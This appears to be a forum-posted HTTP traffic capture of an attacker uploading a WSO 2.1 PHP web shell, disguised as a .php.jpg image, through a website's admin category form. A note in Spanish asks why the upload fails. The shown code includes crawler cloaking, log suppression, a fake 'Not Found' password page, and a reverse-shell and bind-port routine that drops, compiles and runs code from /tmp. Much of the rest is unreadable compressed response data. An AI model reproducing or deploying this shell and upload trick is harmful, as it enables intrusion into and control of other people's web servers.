- POST /admin/categories?rid=63&type=Edit&play=save&page= HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- Content-Type: multipart/form-data; boundary=---------------------------1966138998259963822131653635
- Content-Length: 74857
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_name_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="meta_keywords_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="meta_description_1"
- Cloth Dryers
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_description_1"
- <p>Cloth Dryers</p>
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="parent_id"
- 43
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="categories_image"; filename="W5h311Oculta.php.jpg"
- Content-Type: image/jpeg
- <?php
- /* WSO 2.1 (Web Shell by pgems.in) */
- /*Subhashdasyam.com*/
- /*$auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";*/
- /*old pass=HACKED*/
- /*I changed it to **********/
- $auth_pass = "*********"; // redacted by the poster; the login gate further down compares it with md5() of POST field "pass"
- $color = "#00ff00";
- $default_action = 'FilesMan'; // handler name used by the dispatcher at the end of the payload when POST field "a" is empty
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { // cloaking: any User-Agent containing "Google" gets a 404 status and the script stops
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- @session_start();
- @error_reporting(0); // the next three calls turn off error reporting and error logging for this request
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0); // with set_time_limit(0) below, lifts the script execution time limit
- @set_time_limit(0);
- @set_magic_quotes_runtime(0); // legacy magic-quotes API; the leading @ hides the error where the function is unavailable
- @define('VERSION', '2.1');
- if( get_magic_quotes_gpc() ) { // when magic quotes are on, strip the added slashes from every $_POST value
- function stripslashes_array($array) { // recurses into nested arrays, applies stripslashes() to scalars
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() { // prints markup imitating an Apache "Not Found" page plus a POST form with one password field, then exits
- ?>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- <?php
- exit; // NOTE(review): no header() call in this function, so the response status is presumably not 404 despite the body text; a "Not Found" body carrying a password form is a usable detection signature
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) // login flag is stored in the session under md5 of the request's Host header; the check below runs only while it is unset
- if( empty( $auth_pass ) || // an empty $auth_pass skips the password check entirely
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) // unsalted md5 of POST field "pass", compared with loose ==
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin(); // every other request gets the disguised login page and the script exits there
- <----------CORTE EL CODIGO DE LA WEB SHELL---------------->
- ***********************************************************
- ***********************************************************
- ******************POR MOTIVOS DEL TAMAÑO DEL POST**********
- ***********************************************************
- ***********************************************************
- <----------CORTE EL CODIGO DE LA WEB SHELL---------------->
- Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
- </form>
- <?php
- if(isset($_POST['p1'])) {
- function cf($f,$t) {
- $w=@fopen($f,"w") or @function_exists('file_put_contents');
- if($w) {
- @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
- @fclose($w);
- }
- }
- if($_POST['p1'] == 'bpc') {
- cf("/tmp/bp.c",$bind_port_c);
- $out = ex("gcc -o /tmp/bp /tmp/bp.c");
- @unlink("/tmp/bp.c");
- $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
- }
- if($_POST['p1'] == 'bpp') {
- cf("/tmp/bp.pl",$bind_port_p);
- $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
- }
- if($_POST['p1'] == 'bcc') {
- cf("/tmp/bc.c",$back_connect_c);
- $out = ex("gcc -o /tmp/bc /tmp/bc.c");
- @unlink("/tmp/bc.c");
- $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
- }
- if($_POST['p1'] == 'bcp') {
- cf("/tmp/bc.pl",$back_connect_p);
- $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
- echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
- }
- }
- echo '</div>';
- printFooter();
- }
- if( empty($_POST['a']) ) // POST field "a" names the handler to run; when it is empty a default is filled in
- if(isset($default_action) && function_exists('action' . $default_action))
- $_POST['a'] = $default_action; // 'FilesMan' in this sample, per the assignment near the top of the payload
- else
- $_POST['a'] = 'SecInfo';
- if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) // dispatch happens only if a function named "action" + value is defined
- call_user_func('action' . $_POST['a']); // the called function name is built from request data
- ?>
- <div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r* - SubhashDasyam.com</marquee></div>
- </marquee></div>
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="prev_image"
- W5h311Oculta.php_63.jpg
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="keyword"
- _1345005537
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="column"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="status"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort_order"
- 1
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="filter[p]"
- p
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort[p]"
- 0
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="filter[m]"
- m
- -----------------------------1966138998259963822131653635
- Content-Disposition: form-data; name="sort[m]"
- 0
- -----------------------------1966138998259963822131653635--
- HTTP/1.1 302 Moved Temporarily <<<----------------------------- ESTE ES LO QUE NO ME DEJA SUBIR LA SHELL????????????
- Date: Sat, 25 Aug 2012 15:36:43 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Location: /admin/categories?page=&msg=selected categories modified successfully!!
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 20
- Keep-Alive: timeout=2, max=100
- Connection: Keep-Alive
- Content-Type: text/html
- ....................GET /admin/categories?page=&msg=selected%20categories%20modified%20successfully!! HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- HTTP/1.1 200 OK
- Date: Sat, 25 Aug 2012 15:36:49 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 5250
- Keep-Alive: timeout=2, max=99
- Connection: Keep-Alive
- Content-Type: text/html
- ...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
- .....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
- ...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
- .D.........?.D.....by
- ......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
- _.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
- .M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
- ....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
- .....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
- ..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
- ....$v6#....h..?..`l..Wg
- ..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
- ..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S.......^[.40\C.c.~LF.......a.Ig:,d.L1...Ky_..D..l`.......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]..\.T...M.@..M./......D....n.M.....]......l..k-B...:W1....t..`./'.).u..m..1^;..B.3*mQ;.86.
- .j4=..>..R.%5.S.s.d..C3...1.(TiT'....U.....=...3....RF.Vp.o..1......o....Z...j..h..U.G..S..T-1p3..dt(.......^*...........(!.<.{x$....s....yi...(.5.....yjh^;Q.K.......@.....[.....H&..H..S..4....7%.}..,...X/....,......qOC:.
- ....>6..D.XU.B.p.gk..NG....D.)f...8F...pG.Y@...:U.{..".&..&`...E
- #..j......q^...x.H...D.....X>.rcM.........=...)!...R....E.j..@.&5(.4....):..P9.#Q.L..n..x.;..Z(...X...........T..Q.U..%.we...<eE............F.&....?..z.Iu......U..5U..t.r...D`..b@..........6.nw/................A...5.i......]._..B.=..C.$....A./X%./.{t.N.bq...1...
- .O.z2.% ...:.x.6....A...3.)...<].......Kv3...<b......";..[.-..\0...H..gQ..[.s...p.n...BYq]j9.B.e...).N.N7.....X.99.n..<z.0ctp.....($...Ke..o.JV:....23...#...Z
- A3.K..;>...F....a.....J.
- ....%.......u..x....[..T..(l"..(.j........H.:.
- .kf...-0..FL..>c.@........g.....i...T.6>..O...$4....5..P..K..'=_Ob.5.I_."..p...y....E..6.d... S..;.$...} X;AM8..M...l.8+....eC.......aE...&]4.....wK.Z`.i........&......c....eZ.ZVj.wT..yn...jG......;....Z......h[..D..As:q=Q.....
- ..Q..Y.-...>...2y.......5<.....$._1....9.._..N....w.......;..0~..+.cx.gz.P.H..6.T..a..2..d......Y. .`..O..8.{p..HD.m..7.....=.";..'.f..;...7.b^N...2....;.B.$...6..7P...Z..z.......0..s..Y[9.....x...3...kxB.n`.."w;.]..0.(......V@..G....<..PnN.....k....aFA.!.U.iE-..ZPQ.H...I...../...Iy.R..4.$.mY.......b.~......p^h..`....}....yo...ar...Ab-.*.y..R#./..........g...#..{.tr:.s..^......Y..|..#....P...'4^;!...'..M=..jJ.Ht_.....kp&.fa...)v.~.[.......>...u..>..9..-.]....c-.'.f5.Nn..Y......*..T.a-Us...S;.?.......7...A"O.\Z..n(.t...n........(F....g>...^0...&P|I>q .....s......S..Z.nx.+...G.......M...}......
- .~...o.WUD..u.Z-.w..3caR:.&.......{A.P;..G..qx..[<V.Q<*......&..4.=....d...y(;jQVUDQ........Xn......B.m.......i.Kr}..Ay.<P....*..T..Z...>.K96.$.i,.N...i......)...k).....G........4.....@.E`U.E ...VQ4.~3'?....r..l..B...=.....T..S..8.E\U.E\n.$.l..N...(....0.
- G.].+..y...y.Z.Ke..&..........ts....xP.6.....|..)...5....<.."
- ........f...|I^S6+Fk.+FkY1.E...Q...E.<.>.,.... (...5......."
- ....$.\.?.,_P.P.M.Q.G.Q[.Le..*.:.w..a..y..&.D.6.D..$..".....d.\-C.|..V.x.TW(.J.6.J..T.."
- M.$..F.i\.3.P5....1j..QSYDQ.sx.......|.3o..O..ID:..S...M.Q.G.Q[.Me..$.......2.9.Y.+...x....j.5...;.4..y4.UmqWUDq......q.e....
- .P6.Fm..Fm.4.E...;...).)@...No...#..9#...J..........F.+.(.s^P.Js. Y.>....o"P.;....G..hF.....[4.E...D...7..i.7.M..4..:h...E.O9.'.C.
- _....my.^.5o....*.(...\......l..<..:.."
- ....$..@..y7.;*..Pi.S..._.-........{...3..mY.M..&..v.>..X&>.d.6.5|...%..h.....|.'.@....*o.l..D.
- ...I>.
- .[............1...*.Gs;<...m }...'7....!V{..@..F-.!p.....zLK=..SV&...,J;.,.....H.K/,O.T....S.E[.r..c.....<..jrL2..,,aDv.f....D^.....'.....z.!......m....<.U.....e&........5kI.U.....K.....G.....n......,...f>..^CK....<.......n..q.#J..D...........0.9... .
- {...u=eK....A........C..A_...#....7......L..I...x...@Gc..t3I......3...)d:5.I.+..D.K.....["....#............M ....[B.>.H.....+r.[4.....L*....C;B.A...`.>..}.wp..S.)..ko.._\.6....ty3.~...J.+...|Y.A..1.:../4...Io.-H^....P...Z.HS.....!Fu....GET /admin/images/thickbox/loadingAnimation.gif HTTP/1.1
- Host: www.*********.com
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
- Accept: image/png,image/*;q=0.8,*/*;q=0.5
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 115
- Connection: keep-alive
- Referer: http://www.*********.com/admin/categories?page=&msg=selected%20categories%20modified%20successfully!!
- Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
- HTTP/1.1 404 Not Found
- Date: Sat, 25 Aug 2012 15:36:51 GMT
- Server: Apache
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 3330
- Keep-Alive: timeout=2, max=98
- Connection: Keep-Alive
- Content-Type: text/html
- ...........ZmS....Lg..N..b..RHZ..........hss3.f-...I.J+........,..-0.L.Z.....=k.ZO.>...:....B8.....]p................`.}.g*.......8=..M....n..+..w~....:.f..L...*p.......Da.mMAX....y....z..4XiE\1.....\\o9....US
- .....r..Q..........\u.....P(.+...3".G,.{y..e.%y;...'.dA...u..a..)P....$.:..p....].....<D..J.?F........21......OE....Z......b$.!..$.q...?+..AA...W|..i.......i=i6a...N9...M|.u2j...z..]33.@..w..2.:......p.^"...g.*>.... .Y.s.Q..g..\NfA$bZ........e3D.S..sI.........._
- ...5....<.D......~.s.......... S<...N..G._..,.^].<.\..K.n...O........w`b
- .D.........?.D.....by
- ......eFM.p..!..L..j.....-..6..6.yO.Wmy..T...x..#.~....K.....,...b.(.....EXCi.t.....<..F
- _.../.....m...\.......`.x.2WH.......Y....%5I.m...A&...)...].a.J\....}C........}...D..'Tdu.....+..-|xze*....*miV.g....V.v.9G,e.&......eAE.3^....5.9.g..<.j.|].{..H
- .M2.:..<...5....,..djM...X(...4.YF..>.......+UUFV...V|.Y#.~N.r.E.....c.z...|.Kp..4....Y3S..i.e+.._y;e..c[k..".r.m..U.|......M...A......|....C....}.}e_.K7.....vc
- ....Jd.G14.8.XJ.D.+...S.V..Q.!.@d...
- .....~.`.T&<U..A.-.....o......v`......O(........#.Y\'...}.-.`/e8..2=<&St..,.c"..5V...um..
- ..0-i..](D.K<[.0..YW.."60........+9h...O.Lbv.
- ....$v6#....h..?..`l..Wg
- ..Gh5.{.....Q.....m._uS..`.6a......i.0...._s.+:k..$....*..E......
- ..A..I.......[...wD.4.,a1Z.O.....#p.$m.F.~..;<.1.......{'.X..2.3."...."...7..p4J...^.J..Qt.R8.9?.8.p..w|....x.............:*.!3..."`d...1GrS<..+&sf......p..i..;.......]...+e7.,..fAs^(.E.....(J......y.y.@.....F..0!....$.....-A.T.l...9..J0..2....>FO.\....2....!I.y[a......../.-.:.8...GC.Z...>w.K.x.....f..ar.H..7..gJFS..9&.F.....%.D....&...jU....2..i*~.n.e0. 2qd....M..............e.b.s.L1.g.s.cM.. .s\<.W..C.../....X.9m..z.......V.O.62...S.`j....-6Y.M=..GGck...s..Y|.......-g.q..5.>.@d...e..+.e..i.o!B.z@...o.P.@..E>&..u.z)...'-.....4n...r......B...a....3....L.O..$...c...H.HE2..p4.8dF....tn5....`......Io".-...1........`.........X...L.Bz..M......O....?..,y..~i.O..3....{.}+.qN?..l.........=..i......F./..6^...b..)9<C.........t.-U..3.`f...}L..#.c.......c,.s........^Z./<.6..M3/..T....0*["...9.~m$Q.W.t1..Y..O;.x$.&%.5gs...^.....3.&.!.....[x./..R.c....o.S...9.5...l.....,
- ..P...........`,d.L1...Fy_H.D..l`D......+S.qO.-....O...@m.G..;.' S*...j.N1,1u.]....T...M.@..M./......D....A.. 6
- ...:h)....>..Z....u.bx.C..v..(_^..6...;c.v<...gT..v*pl8.X.hz..}H...Kj|."...\T.f.1.c.P...NF......?.;{ ..f.5.q..6..T...c.)..nG...+t.p...>-..g.`....<..Zb.f....P...Aw...T\)v.-....5<QB&y...HRE=)...\....%|Q.k.g=......v...b7%.9....c....D.5.5.L.
- ....r.i..M.oJb.6$Y,.C.^.zA
- Y..M..g...t....9.}.n.....Z.f.D..@e....cY..S.<Z.q.........b..u....7E.M.WM..
- ...F....]%.......G........7....|....&....=#..{z.+RB......Pa.......MjPviX...St.?.r.G.......u..wdG.P..M.j....u5.s.........=J....#.y...q9!....?..mO.0.._.-...;PO=..#...K4......] ..@.=...L............)......R........._...k-.(R....R.91.#........M;.bV9(...U..,..5..I....q.?..[...f.k")..d6..LB...y._3...F.Q.._y......n.N.`...(D.B9.b..h.5...>.2..s.s....]-..&4%..x.w].'...6k.l..!cL.Rp.k.}.Nu[..c..{1...n.J#......m..)4...nx*u.J....2..`..a-mp..R..;h.H2........:..m...]....j.......d.9;..]7...!...wL...u..._......B..>MZl.H...p.\..6-.Lz..zp...^......)..........!N.....l@..@R....+. .......O.R+F...W.
- .G.......t...Wb..$D..f4.h!.zK.. .M......)]..............@......$ #&.,V=.........j...!.h....yR&.!..C.|Up....b....&.O.....0...|.ng?u|K.R.
- ..G.?...W.7.....(....v`..'.'...../........8..